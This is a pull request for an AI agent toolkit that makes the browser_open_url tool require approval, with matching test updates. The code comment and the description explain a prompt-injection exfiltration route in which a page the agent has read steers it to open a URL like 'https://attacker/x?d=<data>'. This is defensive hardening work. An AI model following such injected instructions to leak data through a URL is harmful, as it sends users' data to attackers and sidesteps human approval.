### PR TITLE
fix(tools): gate browser_open_url as a write

### DIFF
--- a/coworker/connectors/tool_defs.py
+++ b/coworker/connectors/tool_defs.py
@@ -36,7 +36,11 @@ TOOL_DEFS: tuple[ConnectorToolDef, ...] = (
         "browser",
         "browser_open_url",
         "Open URL",
-        "read",
+        # Navigation is a read for the remote host but an outbound channel here: a page the
+        # agent already read can steer it to `browser_open_url("https://attacker/x?d=<data>")`
+        # and the data leaves in the query string with no prompt. Gate it like a write so the
+        # model-supplied URL is approved before the browser navigates (see #399).
+        "write",
         "Open a URL in the Playwright browser.",
     ),
     ConnectorToolDef(

--- a/tests/test_connectors.py
+++ b/tests/test_connectors.py
@@ -257,8 +257,8 @@ def test_engine_connector_tools_are_cowork_scoped(tmp_path):
     assert "browser_read_url" not in helper.registry.names()
     assert "browser_open_url" not in helper.registry.names()
 
-    # §36: browser READS (registry kind) are free; interactions still gate.
-    assert cowork.registry.get("browser_open_url").metadata.requires_approval is False
+    # §36: browser READS (registry kind) are free; interactions + outbound navigation gate.
+    assert cowork.registry.get("browser_open_url").metadata.requires_approval is True
     assert cowork.registry.get("browser_snapshot").metadata.requires_approval is False
     assert cowork.registry.get("browser_click").metadata.requires_approval is True
     assert cowork.registry.get("browser_type").metadata.requires_approval is True

--- a/tests/test_send_target_resolution.py
+++ b/tests/test_send_target_resolution.py
@@ -46,7 +46,7 @@ def test_browser_automation_reads_are_free_interactions_gate():
         tools["browser_snapshot"].__aisuite_tool_metadata__.requires_approval is False
     )
     assert (
-        tools["browser_open_url"].__aisuite_tool_metadata__.requires_approval is False
+        tools["browser_open_url"].__aisuite_tool_metadata__.requires_approval is True
     )
     assert tools["browser_click"].__aisuite_tool_metadata__.requires_approval is True
     assert tools["browser_type"].__aisuite_tool_metadata__.requires_approval is True


### PR DESCRIPTION
The tool was registered kind='read', so approval_for_tool() never gated it and the model could navigate a real browser to a URL of its choosing with no prompt — an outbound exfiltration channel (a page the agent already read can steer it to `open_url("https://attacker/x?d=<data>")`). Its own inline comment claimed it was approval gated; now it is.

Fixes #399.